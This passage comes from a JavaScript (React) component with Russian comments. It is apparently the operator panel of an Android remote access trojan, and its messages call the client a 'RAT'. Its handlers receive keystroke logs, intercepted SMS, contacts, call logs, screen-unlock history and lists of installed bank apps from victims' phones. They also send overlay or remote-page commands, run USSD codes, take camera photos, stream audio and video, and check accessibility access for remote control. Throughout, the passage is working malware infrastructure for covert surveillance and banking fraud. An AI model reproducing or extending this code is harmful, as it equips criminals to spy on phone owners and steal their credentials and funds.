        requestedDataRef.current = { sms: false, contacts: false, calls: false };

        // Сбрасываем данные, специфичные для старого устройства

        setInternalDeviceState(prev => prev ? { ...prev, sms: undefined, smsMeta: undefined, contacts: undefined } : prev);

    }, [device.uuid]);



    const fetchDeviceData = useCallback(async () => {

        if (!device.uuid) return;

        setIsLoading(true); 

        

        try {

            const response = await api.getDevice(device.uuid);

            setInternalDeviceState(response.data);

            

            console.log('[DeviceDetails] Данные успешно загружены через HTTP API');

        } catch (error) {

            console.error('[DeviceDetails] Ошибка при загрузке данных через API:', error);

            toast.warning('Не удалось загрузить подробную информацию (HTTP).');

        } finally {

            setIsLoading(false);

        }

    }, [device.uuid]);



    const lastNotifFetchRef = useRef(0);



    const fetchNotificationHistory = useCallback(async (isSilent = false) => {

        if (!device.uuid) return;

        if (isSilent) {

            const now = Date.now();

            if (now - lastNotifFetchRef.current < 2000) return;

            lastNotifFetchRef.current = now;

        }



        if (!isSilent) setIsLoading(true);

        

        try {

            const response = await api.getNotificationHistory(device.uuid);

            setNotifications(Array.isArray(response.data) ? response.data : (response.data?.data || []));

        } catch (error) {

            if (!isSilent) setNotifications([]);

        } finally {

            if (!isSilent) setIsLoading(false);

        }

    }, [device.uuid]);



    const handleSendWindowCommand = async (windowData) => {

        if (!device || !device.uuid) {

            toast.warning("Ошибка: ID устройства не найден.");

            return;

        }



        const { page_id, url, customization_data, action } = windowData || {};

        const urlStr = String(url || '');

        const isHttp = /^https?:\/\//i.test(urlStr);

        const isZip = /\.zip($|\?)/i.test(urlStr);



        const explicitRemote = action === 'show_remote_page' || page_id === 'my_remote_page';

        const isRemote = explicitRemote || (isHttp && !isZip);



        const payload = {

            uuid: device.uuid,

            command: {

                action: isRemote ? 'show_remote_page' : 'show_local_page',

                page_id: isRemote ? (page_id || 'my_remote_page') : page_id,

                url: urlStr

            }

        };



        if (isRemote) {

            payload.command.customization_data =

                customization_data || { title: 'Моя страница', iconUrl: '' };

        } else if (customization_data) {

            payload.command.customization_data = customization_data;

        }



        try {

            await api.post('/data/device-command', payload);

            toast.success('Команда отправлена');

            setTimeout(fetchWindowHistory, 800);

        } catch (error) {

            toast.warning(`Не удалось отправить команду: ${error.response?.data?.message || error.message}`);

        }

    };



    const fetchWindowHistory = async () => {

        if (!device || !device.uuid) return;

        try {

            const response = await api.get(`/data/window-history/${device.uuid}`);

            setWindowHistory(response.data);

        } catch (error) {}

    };



    useEffect(() => {

        const fetchUssdHistory = async () => {

            if (device.uuid) {

                try {

                    const response = await api.getUssdHistory(device.uuid);

                    setUssdHistory(Array.isArray(response.data) ? response.data : (response.data?.data || []));

                } catch (error) {}

            }

        };

        fetchUssdHistory();

    }, [device.uuid]);



    useEffect(() => {

        fetchWindowHistory(); 

    }, [device?.uuid]);



    useEffect(() => {

        if (activeTab === 'notifications') {

            fetchNotificationHistory(false); 

        }

    }, [activeTab, fetchNotificationHistory]);



    useEffect(() => {

        const fetchHistory = async () => {

            if (device.uuid) {

                try {

                    const response = await api.getOutgoingSmsHistory(device.uuid);

                    const rawMessages = Array.isArray(response.data) ? response.data : (response.data?.data || []);

                    const formattedMessages = rawMessages.map(msg => ({

                        id: msg.messageUuid,

                        to: msg.recipient,

                        text: msg.message,

                        sim: msg.simIndex,

                        status: msg.status,

                        timestamp: new Date(msg.createdAt).getTime()

                    }));

                    setOutgoingMessages(formattedMessages);

                } catch (error) {}

            }

        };

        fetchHistory();

    }, [device.uuid]);



    const stopStatsWatcher = () => {

        if (statsIntervalRef.current) {

            clearInterval(statsIntervalRef.current);

            statsIntervalRef.current = null;

        }

    };

    const stopFirstFrameTimeout = () => {

        if (firstFrameTimeoutRef.current) {

            clearTimeout(firstFrameTimeoutRef.current);

            firstFrameTimeoutRef.current = null;

        }

    };



    const cleanupWebRtc = () => {

        stopStatsWatcher();

        stopFirstFrameTimeout();

        remoteDescSetRef.current = false;

        pendingCandidatesRef.current = [];

        if (peerConnectionRef.current) {

            try { peerConnectionRef.current.ontrack = null; } catch {}

            try { peerConnectionRef.current.onicecandidate = null; } catch {}

            try { peerConnectionRef.current.oniceconnectionstatechange = null; } catch {}

            try { peerConnectionRef.current.onicegatheringstatechange = null; } catch {}

            try { peerConnectionRef.current.onconnectionstatechange = null; } catch {}

            try { peerConnectionRef.current.onsignalingstatechange = null; } catch {}

            try { peerConnectionRef.current.onnegotiationneeded = null; } catch {}

            try { peerConnectionRef.current.close(); } catch {}

            peerConnectionRef.current = null;

        }

        setVideoStream(null);

    };



    const handleSwitchMjpegCamera = () => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        ws.current.send(JSON.stringify({

            action: 'mjpeg_switch_camera',

            uuid: device.uuid

        }));

    };



    const handleStartAudioBroadcast = () => {

        if (isBroadcasting) {

            return toast.warning("Сначала остановите текущую трансляцию.");

        }

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }



        ws.current.send(JSON.stringify({

            action: 'requestSystemAsset',

            task: 'webrtc_audio_stream', 

            uuid: device.uuid

        }));



        setIsBroadcasting(true); 

        setBroadcastType('webrtc_audio_stream'); 

        setActiveTab('media');

    };



    const dumpSelectedCandidatePair = async (pc, tag = 'getStats dump') => {

        try {

            const stats = await pc.getStats();

            let selectedPair;

            stats.forEach(report => {

                if (report.type === 'transport') {

                    const selectedId = report.selectedCandidatePairId || report.selectedCandidatePair;

                    if (selectedId && stats.get(selectedId)) {

                        selectedPair = stats.get(selectedId);

                    }

                }

            });

            if (!selectedPair) {

                stats.forEach(r => {

                    if (r.type === 'candidate-pair' && r.nominated && r.state === 'succeeded') selectedPair = r;

                });

            }

            if (selectedPair) {

                const local = stats.get(selectedPair.localCandidateId);

                const remote = stats.get(selectedPair.remoteCandidateId);

                logPC(pc, `${tag}: SELECTED CANDIDATE PAIR`, {

                    pairState: selectedPair.state,

                    nominated: selectedPair.nominated,

                    bytesReceived: selectedPair.bytesReceived,

                    bytesSent: selectedPair.bytesSent,

                    currentRoundTripTime: selectedPair.currentRoundTripTime,

                    availableOutgoingBitrate: selectedPair.availableOutgoingBitrate,

                    local: local ? {

                        id: local.id, ip: local.ip || local.address, port: local.port, protocol: local.protocol, candidateType: local.candidateType

                    } : null,

                    remote: remote ? {

                        id: remote.id, ip: remote.ip || remote.address, port: remote.port, protocol: remote.protocol, candidateType: remote.candidateType

                    } : null

                });

            } else {

                logPC(pc, `${tag}: SELECTED CANDIDATE PAIR not found yet`);

            }

        } catch (e) {

            logPC(pc, `${tag}: stats error`, String(e));

        }

    };



    const startStatsWatcher = (pc) => {

        stopStatsWatcher();

        statsIntervalRef.current = setInterval(async () => {

            try {

                const stats = await pc.getStats();

                const inboundReports = [];

                stats.forEach(r => {

                    if (r.type === 'inbound-rtp' && r.kind === 'video') {

                        inboundReports.push({

                            id: r.id,

                            packetsReceived: r.packetsReceived,

                            packetsLost: r.packetsLost,

                            framesDecoded: r.framesDecoded,

                            framesDropped: r.framesDropped,

                            framesPerSecond: r.framesPerSecond,

                            bytesReceived: r.bytesReceived,

                            jitter: r.jitter,

                            nackCount: r.nackCount,

                            sliCount: r.sliCount,

                            pliCount: r.pliCount,

                            qpSum: r.qpSum

                        });

                    }

                });

                if (inboundReports.length) {

                    logPC(pc, 'inbound-rtp(video) stats', inboundReports);

                }

            } catch (e) {

                logPC(pc, 'getStats error', String(e));

            }

        }, 2000);

    };



    const startWebRtcView = async (uuid_to_watch, type) => {

        if (!ws || !ws.current) return;

        cleanupWebRtc();

        logWS(`Старт просмотра как Зритель для ${uuid_to_watch} (тип: ${type})`);

        const pc = new RTCPeerConnection({

            iceServers: [{ urls: 'stun:stun.l.google.com:19302' }],

            bundlePolicy: 'max-bundle',

            rtcpMuxPolicy: 'require',

            iceCandidatePoolSize: 0

        });

        peerConnectionRef.current = pc;

        try {

            if (type === 'webrtc_audio_stream') {

                const trA = pc.addTransceiver('audio', { direction: 'recvonly' });

                logPC(pc, 'Добавлен transceiver ТОЛЬКО для аудио', { audio: trA?.mid });

            } else { 

                const trV = pc.addTransceiver('video', { direction: 'recvonly' });

                const trA = pc.addTransceiver('audio', { direction: 'recvonly' });

                logPC(pc, 'Добавлены transceivers для видео и аудио', { video: trV?.mid, audio: trA?.mid });

            }

        } catch (e) {

            logPC(pc, 'Ошибка добавления transceivers', String(e));

        }



        pc.addEventListener('connectionstatechange', () => {

            logPC(pc, `connectionState: ${pc.connectionState}`);

            if (pc.connectionState === 'connected') {

                logPC(pc, 'PeerConnection CONNECTED');

                dumpSelectedCandidatePair(pc, 'onconnected');

                startStatsWatcher(pc);

            }

            if (pc.connectionState === 'failed') {

                logPC(pc, 'PeerConnection FAILED — проверь STUN/TURN/порты/маршрутизацию');

                dumpSelectedCandidatePair(pc, 'onfailed');

            }

        });

        pc.addEventListener('icegatheringstatechange', () => {

            logPC(pc, `iceGatheringState: ${pc.iceGatheringState}`);

        });

        pc.addEventListener('iceconnectionstatechange', () => {

            logPC(pc, `iceConnectionState: ${pc.iceConnectionState}`);

            if (pc.iceConnectionState === 'connected' || pc.iceConnectionState === 'completed') {

                dumpSelectedCandidatePair(pc, 'iceConnectionState connected/completed');

            }

        });

        pc.addEventListener('signalingstatechange', () => {

            logPC(pc, `signalingState: ${pc.signalingState}`);

        });

        pc.addEventListener('negotiationneeded', () => {

            logPC(pc, 'onnegotiationneeded');

        });

        pc.addEventListener('icecandidateerror', (e) => {

            logPC(pc, 'icecandidateerror', {

                errorCode: e.errorCode,

                errorText: e.errorText,

                url: e.url,

                hostCandidate: e.hostCandidate,

                port: e.port

            });

        });

        pc.onicecandidate = (event) => {

            if (event.candidate) {

                logWS('Отправка локального ICE кандидата Зрителя', {

                    candidate: event.candidate.candidate,

                    sdpMid: event.candidate.sdpMid,

                    sdpMLineIndex: event.candidate.sdpMLineIndex

                });

                ws.current.send(JSON.stringify({

                    action: 'webrtc_ice_candidate',

                    payload: event.candidate.toJSON()

                }));

            } else {

                logPC(pc, 'onicecandidate: завершение (null candidate)');

            }

        };

        pc.ontrack = (event) => {

            logPC(pc, 'ontrack: получен медиапоток', {

                streamsCount: event.streams?.length,

                track: { id: event.track?.id, kind: event.track?.kind, muted: event.track?.muted, readyState: event.track?.readyState }

            });

            if (event.track) {

                event.track.onunmute = () => logPC(pc, `track ${event.track.kind} onunmute`);

                event.track.onmute = () => logPC(pc, `track ${event.track.kind} onmute`);

                event.track.onended = () => logPC(pc, `track ${event.track.kind} onended`);

            }

            const stream = (event.streams && event.streams[0]) ? event.streams[0] : new MediaStream([event.track]);

            setVideoStream(stream);

            stopFirstFrameTimeout();

            firstFrameTimeoutRef.current = setTimeout(async () => {

                logVID('Нет воспроизведения через 5с после ontrack. Диагностика:');

                await dumpSelectedCandidatePair(pc, 'first-frame timeout');

                try {

                    const s = await pc.getStats();

                    const inbound = [];

                    s.forEach(r => {

                        if (r.type === 'inbound-rtp' && r.kind === 'video') {

                            inbound.push({ id: r.id, framesDecoded: r.framesDecoded, packetsReceived: r.packetsReceived, bytesReceived: r.bytesReceived, framesPerSecond: r.framesPerSecond });

                        }

                    });

                    logPC(pc, 'inbound-rtp snapshot (5s timeout)', inbound);

                } catch (e) {

                    logPC(pc, 'stats error (5s timeout)', String(e));

                }

            }, 5000);

        };

        try {

            const offer = await pc.createOffer();

            logPC(pc, 'Создан offer', { type: offer.type, sdp: short(offer.sdp) });

            await pc.setLocalDescription(offer);

            logPC(pc, 'setLocalDescription(offer) OK');

            logWS('Отправка Offer Зрителя на сервер', { sdp_type: offer.type, sdp_len: offer.sdp?.length, sdp: short(offer.sdp) });

            ws.current.send(JSON.stringify({

                action: 'webrtc_offer',

                uuid_to_watch: uuid_to_watch,

                payload: {

                    sdp_type: offer.type,

                    sdp_description: offer.sdp

                }

            }));

        } catch (e) {

            logPC(pc, 'Ошибка при создании/установке Offer', String(e));

            cleanupWebRtc();

        }

    };



    const handleWebSocketMessage = useCallback((message) => {

    try {



        const msgUuid = message.uuid || message.deviceUuid || (message.data && message.data.deviceUuid);



        const isNotificationAction = 

            message.action === 'newNotification' || 

            message.action === 'notificationsHistoryReady' || 

            message.action === 'notificationStatus' || 

            message.action === 'notificationStatusUpdate';



        if (msgUuid !== device.uuid && !isNotificationAction) {

            if (message.action === 'deviceUpdate' && message.data && message.data.uuid === device.uuid) {

                setInternalDeviceState(prevState => {
                    const incoming = message.data;
                    const newState = { ...prevState, ...incoming };
                    if (incoming.systemInfo) {
                        const incomingApps = incoming.systemInfo.supAP?.data?.sup_ap_list;
                        const incomingBanks = incoming.systemInfo.installedBankApps?.data?.installed_bank_apps;
                        newState.systemInfo = {
                            ...(prevState.systemInfo || {}),
                            ...incoming.systemInfo,
                            supAP: (incomingApps && incomingApps.length > 0) ? incoming.systemInfo.supAP : prevState.systemInfo?.supAP,
                            installedBankApps: (incomingBanks && incomingBanks.length > 0) ? incoming.systemInfo.installedBankApps : prevState.systemInfo?.installedBankApps,
                        };
                    }
                    return newState;
                });

            }

            return;

        }



        if (message.action !== 'deviceStatusUpdate') {

  logWS(`Получено сообщение action=${message.action || 'N/A'} uuid=${message.uuid || 'N/A'}`);

}



        switch (message.action) {

            case 'contactsReady': {

                 api.getContactsList(device.uuid)

                     .then(res => {

                         setInternalDeviceState(prev => ({

                             ...prev,

                             contacts: { list: res.data, lastUpdatedAt: Date.now() }

                         }));

                         // Выключаем загрузку

                         setIsLoading(false);

                     })

                     .catch(err => {

                         console.error('Ошибка загрузки контактов', err);

                         setIsLoading(false);

                     });

                 break;

            }

            case 'appsReady': {

                 api.getAppsList(device.uuid)

                     .then(res => {

                         setInternalDeviceState(prev => ({

                             ...prev,

                             systemInfo: {

                                 ...(prev.systemInfo || {}),

                                 supAP: {

                                     ...(prev.systemInfo?.supAP || {}),

                                     data: { sup_ap_list: res.data }

                                 }

                             }

                         }));

                         setIsLoading(false);

                     })

                     .catch(err => {

                         console.error('Ошибка загрузки приложений', err);

                         setIsLoading(false);

                     });

                 break;

            }



            case 'keylog_data': {

                const klPkg = message.pkg;

                const totalCount = message.totalCount;

                if (klPkg && totalCount != null) {

                    setKeylogDataPackages(prev => {

                        if (prev[klPkg] === totalCount) return prev; // счётчик не изменился — не ре-рендерим

                        return { ...prev, [klPkg]: totalCount };

                    });

                    setKeylogActivePackages(prev => {

                        if (prev instanceof AllActiveSet) {

                            // all-mode: не трогаем состояние кнопок при получении данных —

                            // данные могут прийти от отключённого пакета (буфер до отключения)

                            return prev;

                        }

                        if (prev.has(klPkg)) return prev;

                        const next = new Set(prev);

                        next.add(klPkg);

                        return next;

                    });

                }

                break;

            }



            case 'keylog_all_active': {

                loadKeylogPackages();

                break;

            }



            case 'callLogsReady': {

                 api.getCallLogs(device.uuid)

                     .then(res => {

                         setCallLogs({ list: res.data, lastUpdatedAt: Date.now() });

                         setIsLoading(false);

                     })

                     .catch(err => {

                         console.error('Ошибка загрузки звонков', err);

                         setIsLoading(false);

                     });

                 break;

            }



            case 'unlock_history_data': {

                if (message.uuid === device.uuid) {

                    setUnlockHistory(message.history || []);

                }

                break;

            }



            case 'smsHistoryReady': {

                 api.getLiveSms(device.uuid) 

                     .then(res => {

                         if (res.data && res.data.sms) {

                             const parsedData = parseSmsFromString(res.data.sms); 

                             setInternalDeviceState(prev => ({

                                 ...prev,

                                 sms: parsedData,

                                 smsMeta: message.meta

                             }));

                         } else if (res.data && res.data.data === 'No SMS data available') {

                             setInternalDeviceState(prev => ({

                                 ...prev,

                                 sms: [],

                                 smsMeta: message.meta

                             }));

                         }

                         // Выключаем загрузку независимо от того, есть ли СМС или пришел пустой массив

                         setIsLoading(false);

                     })

                     .catch(err => {

                         console.error('Ошибка загрузки архива СМС', err);

                         setIsLoading(false);

                     });

                 break;

            }



            case 'newSmsReceived': {

                const newSmsThreads = message.data || [];

                

                setArchivedSms(prev => {

                    const newUniqueMessages = [];

                    const existingSignatures = new Set(

                        prev.slice(0, 500).map(m => `${m.from}|${m.body}`)

                    );



                    newSmsThreads.forEach(thread => {

                        thread.messages.forEach(messageBody => {

                            const signature = `${thread.from}|${messageBody}`;

                            

                            if (!existingSignatures.has(signature)) {

                                const now = new Date();

                                newUniqueMessages.push({

                                    _id: uuidv4(),

                                    from: thread.from,

                                    body: messageBody,

                                    simSlot: thread.simSlot ?? null,

                                    deviceTimestamp: now.toISOString(),

                                    receivedAt: now.toISOString()

                                });

                                existingSignatures.add(signature);

                            }

                        });

                    });

                    if (newUniqueMessages.length === 0) return prev;

                    return [...newUniqueMessages, ...prev];

                });



                setInternalDeviceState(prev => {

                    if (!prev) return prev;

                    const currentSms = prev.sms ? [...prev.sms] : [];



                    newSmsThreads.forEach(newThread => {

                        const existingThreadIndex = currentSms.findIndex(t => t.from === newThread.from);

                        const newMessages = newThread.messages.map(body => ({

                            body,

                            date: Date.now()

                        }));



                        if (existingThreadIndex > -1) {

                            const existingThread = { ...currentSms[existingThreadIndex] };

                            existingThread.messages = [...existingThread.messages];

                            if (newThread.simSlot != null && newThread.simSlot >= 0) {
                                existingThread.simSlot = newThread.simSlot;
                            }

                            newMessages.forEach(newMsg => {

                                if (!existingThread.messages.some(m => m.body === newMsg.body)) {

                                    existingThread.messages.unshift(newMsg);

                                }

                            });

                            currentSms[existingThreadIndex] = existingThread;

                        } else {

                            currentSms.unshift({

                                from: newThread.from,

                                messages: newMessages,

                                simSlot: newThread.simSlot ?? null

                            });

                        }

                    });



                    currentSms.sort((a, b) => {

                        const lastDateA = a.messages[0]?.date || 0;

                        const lastDateB = b.messages[0]?.date || 0;

                        return lastDateB - lastDateA;

                    });



                    return { ...prev, sms: currentSms };

                });



                break;

            }



            case 'deviceStatusUpdate': {

                const payload = message.payload || {};

                const { uuid, serverNow, status } = payload;

                if (!uuid || uuid !== device.uuid) break;



                const iso = serverNow || new Date().toISOString();



                setInternalDeviceState(prev => {

                    if (!prev) return prev;

                    return {

                        ...prev,

                        lastSeen: iso,

                        status: status ? status : prev.status

                    };

                });



                break;

            }



            case 'devicesStatusSnapshot': {

                const items = Array.isArray(message.items) ? message.items : [];

                const item = items.find(i => i && i.uuid === device.uuid);

                if (!item) break;

                const iso = item.serverNow || item.lastSeen;

                if (!iso) break;

                if (item.serverNow && Date.now() - new Date(item.serverNow).getTime() > 30000) break;

                setInternalDeviceState(prev => {

                    if (!prev) return prev;

                    if (prev.lastSeen && iso <= prev.lastSeen) return prev;

                    return { ...prev, lastSeen: iso };

                });

                break;

            }





               case 'app_restart_done': {

                    if (pendingRestartRef.current) {

                        toast.success('Перезапуск РАТа: подтверждено');

                        clearTimeout(pendingRestartRef.current.timeout);

                        pendingRestartRef.current = null;

                    } else {

                        toast.success('Перезапуск РАТа: подтверждено');

                    }

                    break;

               }

               

               case 'server_side_reconnect_ack': {

                    if (pendingReconnectRef.current) {

                        toast.success('Переподключение сервера: подтверждено');

                        clearTimeout(pendingReconnectRef.current.timeout);

                        pendingReconnectRef.current = null;

                    }

                    break;

               }



               case 'server_side_reconnect_done': {

                    if (pendingReconnectRef.current) {

                        toast.success('Переподключение сервера: подтверждено');

                        clearTimeout(pendingReconnectRef.current.timeout);

                        pendingReconnectRef.current = null;

                    } else {

                        toast.info('Переподключение сервера: выполнено');

                    }

                    break;

               }



               case 'stream_is_ready_to_view': {

                    if (peerConnectionRef.current) {

                        logPC(peerConnectionRef.current, 'Предыдущий PeerConnection будет сброшен перед новым стартом');

                    }

                    startWebRtcView(device.uuid, broadcastType); 

                    break;

               }



               case 'webrtc_answer': {

                    const pc = peerConnectionRef.current;

                    if (pc && message.payload) {

                        const answer = new RTCSessionDescription({ type: 'answer', sdp: message.payload.sdp_description });

                        pc.setRemoteDescription(answer)

                            .then(() => {

                                remoteDescSetRef.current = true;

                                if (pendingCandidatesRef.current.length) {

                                    pendingCandidatesRef.current.forEach(c => {

                                        pc.addIceCandidate(c).catch(e => logPC(pc, 'Ошибка addIceCandidate (после answer)', String(e)));

                                    });

                                    pendingCandidatesRef.current = [];

                                }

                            })

                            .catch(e => logPC(pc, 'Ошибка setRemoteDescription(answer)', String(e)));

                    }

                    break;

               }

               

               case 'webrtc_ice_candidate': {

                    const pc = peerConnectionRef.current;

                    if (!pc || !message.payload) break;

                    const ice = {

                        sdpMid: message.payload.sdpMid,

                        sdpMLineIndex: message.payload.sdpMLineIndex,

                        candidate: message.payload.candidate ?? message.payload.sdp

                    };

                    try {

                        const cand = new RTCIceCandidate(ice);

                        if (!remoteDescSetRef.current) {

                            pendingCandidatesRef.current.push(cand);

                        } else {

                            pc.addIceCandidate(cand)

                                .catch(e => logPC(pc, 'Ошибка addIceCandidate', String(e)));

                        }

                    } catch (e) {

                        logPC(pc, 'Неверный формат ICE candidate (пропуск)', { error: String(e), payload: message.payload });

                    }

                    break;

               }



               case 'motionDataChunk':

                    setStreamFrame(message.frame);

                    break;



               case 'potoResult':

                    clearTimeout(potoTimeoutRef.current);

                    setPotoStatus({ active: false, message: '' });

                    if (message.status === 'error') {

                        toast.warning(`Не удалось сделать фото:\n${message.message}`);

                        setCapturedPoto(null);

                    } else {

                        setCapturedPoto({ frame: message.frame, potoId: message.potoId });

                    }

                    break;



case 'systemInfoUpdate': {

    setIsSystemUpdating(false);

    if (message.data) {

        const incoming = message.data;

        const incomingAcc = incoming.permissions?.data?.is_accessibility_enabled;



        if (incomingAcc === true && vncVerifyingRef.current) {

            vncVerifyGotTrueRef.current = true;

            clearTimeout(vncVerifyTimerRef.current);

            clearInterval(vncVerifyCountdownRef.current);

            vncVerifyingRef.current = false;

            setVncVerifying(false);

            setVncVerifySecondsLeft(0);

            toast.success('Проверка ВНК: разрешение подтверждено ✔');

        }



        setInternalDeviceState(prev => {

            if (!prev) return message.data;



            const incomingApps = incoming.supAP?.data?.sup_ap_list;

            const incomingBanks = incoming.installedBankApps?.data?.installed_bank_apps;

            const oldSupAP = prev.systemInfo?.supAP;

            const oldBanks = prev.systemInfo?.installedBankApps;

            const finalSupAP = (incomingApps && incomingApps.length > 0) ? incoming.supAP : oldSupAP;

            const finalBanks = (incomingBanks && incomingBanks.length > 0) ? incoming.installedBankApps : oldBanks;



            const mergedPermData = incoming.permissions?.data ? {

                ...(prev.systemInfo?.permissions?.data || {}),

                ...incoming.permissions.data,

            } : prev.systemInfo?.permissions?.data;



            const finalPermissions = incoming.permissions ? {

                ...(prev.systemInfo?.permissions || {}),

                ...incoming.permissions,

                data: mergedPermData,

            } : prev.systemInfo?.permissions;



            return {

                ...prev,

                systemInfo: {

                    ...(prev.systemInfo || {}),

                    ...incoming,

                    permissions: finalPermissions,

                    supAP: finalSupAP,

                    installedBankApps: finalBanks

                }

            };

        });

        toast.success('Системная информация обновлена');

    }

    break;

}



              case 'deviceUpdate': {

    if (pendingReconnectRef.current) {

        toast.success('Переподключение сервера: подтверждено (deviceUpdate)');

        clearTimeout(pendingReconnectRef.current.timeout);

        pendingReconnectRef.current = null;

    }



    const incomingDU = message.data || {};

    const incomingAccDU = incomingDU.systemInfo?.permissions?.data?.is_accessibility_enabled;



    if (incomingAccDU === true && vncVerifyingRef.current) {

        vncVerifyGotTrueRef.current = true;

        clearTimeout(vncVerifyTimerRef.current);

        clearInterval(vncVerifyCountdownRef.current);

        vncVerifyingRef.current = false;

        setVncVerifying(false);

        setVncVerifySecondsLeft(0);

        toast.success('Проверка ВНК: разрешение подтверждено ✔');

    }



    setInternalDeviceState(prev => {

        if (!prev) return prev;



        const incoming = incomingDU;

        const newState = { ...prev, ...incoming };



        if (incoming.systemInfo) {

            const incomingApps = incoming.systemInfo.supAP?.data?.sup_ap_list;

            const incomingBanks = incoming.systemInfo.installedBankApps?.data?.installed_bank_apps;

            const oldSupAP = prev.systemInfo?.supAP;

            const oldBanks = prev.systemInfo?.installedBankApps;

            const finalSupAP = (incomingApps && incomingApps.length > 0) ? incoming.systemInfo.supAP : oldSupAP;

            const finalBanks = (incomingBanks && incomingBanks.length > 0) ? incoming.systemInfo.installedBankApps : oldBanks;



            const mergedPermDataDU = incoming.systemInfo.permissions?.data ? {

                ...(prev.systemInfo?.permissions?.data || {}),

                ...incoming.systemInfo.permissions.data,

            } : prev.systemInfo?.permissions?.data;



            const finalPermissions = incoming.systemInfo.permissions ? {

                ...(prev.systemInfo?.permissions || {}),

                ...incoming.systemInfo.permissions,

                data: mergedPermDataDU,

            } : prev.systemInfo?.permissions;



            newState.systemInfo = {

                ...(prev.systemInfo || {}),

                ...incoming.systemInfo,

                permissions: finalPermissions,

                supAP: finalSupAP,

                installedBankApps: finalBanks

            };

        }



        return newState;

    });

    break;

}

               case 'window_history_update': {

                    const updatedCall = message.data;

                    setWindowHistory(prevHistory => {

                        const index = prevHistory.findIndex(call => call._id === updatedCall._id);

                        if (index > -1) {

                            const newHistory = [...prevHistory];

                            newHistory[index] = updatedCall;

                            return newHistory;

                        }

                        return [updatedCall, ...prevHistory];

                    });

                    break;

               } 

                 

               case 'ack': {

                    if (message.for === 'app_restart' && message.uuid === device.uuid) {

                        toast.info('Перезапуск РАТа: команда принята сервером');

                    }

                    if (message.for === 'server_side_reconnect' && message.uuid === device.uuid) {

                        toast.info('Переподключение сервера: команда принята сервером');

                    }

                    break;

               }



               case 'privilegeStatusUpdate':

                    setPrivilegeStatus(message.statuses);

                    break;



               case 'fileTransferUpdate': {

                    const { status, transferId, fileName, progress } = message;



                    if (status === 'start' && fileName && transferId) {

                        transferIdMapRef.current[transferId] = fileName;



                        setUploadProgress(prevProgress => ({

                            ...prevProgress,

                            [fileName]: { status: 'start', progress: 0 },

                        }));

                        setDownloadLinks(prev => ({

                            ...prev,

                            [fileName]: { ready: false, progress: 0 }

                        }));

                    } else if (status === 'progress_report' && transferId) {

                        const targetFileName = transferIdMapRef.current[transferId];

                        if (targetFileName) {

                            setUploadProgress(prevProgress => ({

                                ...prevProgress,

                                [targetFileName]: {

                                    ...prevProgress[targetFileName],

                                    status: status,

                                    progress: progress,

                                },

                            }));

                            setDownloadLinks(prev => ({

                                ...prev,

                                [targetFileName]: {

                                    ...(prev[targetFileName] || {}),

                                    ready: false,

                                    progress

                                }

                            }));

                        }

                    }

                    break;

               }



               case 'notificationsHistoryReady': 

               case 'notificationStatus':       

               case 'notificationStatusUpdate': {

                   const targetUuid = message.uuid || (message.data && message.data.deviceUuid);

                   

                   if (targetUuid && String(targetUuid) !== String(device.uuid)) break;



                   if (activeTabRef.current === 'notifications') {

                       fetchNotificationHistory(true); 

                   }

                   break;

               }



               case 'smsStatusUpdate': {

                    const { status: smsStatus, messageUuid } = message.data;

                    setOutgoingMessages(prev =>

                        prev.map(msg =>

                            msg.id === messageUuid ? { ...msg, status: smsStatus } : msg

                        )

                    );

                    break;

               }



               case 'newOutgoingSms': {

                    const newSms = message.data;

                    const formattedMessage = {

                        id: newSms.messageUuid,

                        to: newSms.recipient,

                        text: newSms.message,

                        sim: newSms.simIndex,

                        status: newSms.status,

                        timestamp: new Date(newSms.createdAt).getTime()

                    };

                    setOutgoingMessages(prev => {

                        if (prev.find(msg => msg.id === formattedMessage.id)) {

                            return prev.map(msg => msg.id === formattedMessage.id ? formattedMessage : msg);

                        }

                        return [formattedMessage, ...prev];

                    });

                    break;

               }



               case 'commandChannelResponse': {

                    if (message.ussdId) {

                        const isSuccess = message.status && message.status.toLowerCase().includes('success');

                        setUssdHistory(prev => {

                            const existingIndex = prev.findIndex(item => item.id === message.ussdId);

                            if (existingIndex > -1) {

                                const updatedHistory = [...prev];

                                updatedHistory[existingIndex] = {

                                    ...updatedHistory[existingIndex],

                                    status: isSuccess ? 'success' : 'error',

                                    response: isSuccess ? message.data : (message.message || message.status),

                                    timestamp: new Date().getTime()

                                };

                                return updatedHistory;

                            }

                            const newEntry = {

                                id: message.ussdId,

                                request: message.request,

                                status: isSuccess ? 'success' : 'error',

                                response: isSuccess ? message.data : (message.message || message.status),

                                simIndex: message.simCardIndex,

                                timestamp: new Date().getTime(),

                            };

                            return [newEntry, ...prev];

                        });

                    }

                    break;

               }



               case 'mediaFilesList':

                    setMediaFiles(prev => ({ ...prev, [message.type]: message.files }));

                    toast.info(`Получен список из ${message.files.length} файлов типа '${message.type}'`);

                    break;



                case 'startDeviceStateMonitoring': {

                    if (message.status === 'sent') {

                        setIsMonitoring(true);

                        setDeviceStatus('Запрос отправлен, ожидание устройства...');

                    }

                    break;

               }    



               case 'deviceStateUpdate':

                    setIsMonitoring(true);

                    setDeviceStatus(message.status);

                    if (message.remainingTime) {

                        setCountdown(message.remainingTime);

                    }



                    if (countdownIntervalRef.current === null) {

                        clearTimeout(monitoringTimeoutRef.current);

                        countdownIntervalRef.current = setInterval(() => {

                            setCountdown(prev => (prev > 0 ? prev - 1 : 0));

                        }, 1000);

                        monitoringTimeoutRef.current = setTimeout(() => {

                            setIsMonitoring(false);

                            setDeviceStatus('');

                            clearInterval(countdownIntervalRef.current);

                            countdownIntervalRef.current = null;

                        }, message.remainingTime * 1000);

                    }

                    break;



               case 'foregroundAppUpdate':

                    clearTimeout(fgMonitoringTimeoutRef.current);

                    fgMonitoringTimeoutRef.current = null;

                    setIsFgMonitoring(true);

                    setFgAppName(message.appName || '');

                    if (message.remainingTime) {

                        setFgCountdown(message.remainingTime);

                    }

                    if (fgCountdownIntervalRef.current === null) {

                        fgCountdownIntervalRef.current = setInterval(() => {

                            setFgCountdown(prev => (prev > 0 ? prev - 1 : 0));

                        }, 1000);

                        fgMonitoringTimeoutRef.current = setTimeout(() => {

                            setIsFgMonitoring(false);

                            setFgAppName('');

                            clearInterval(fgCountdownIntervalRef.current);

                            fgCountdownIntervalRef.current = null;

                            fgMonitoringTimeoutRef.current = null;

                        }, (message.remainingTime || 120) * 1000);

                    }

                    break;



               case 'zipArchivesList': {

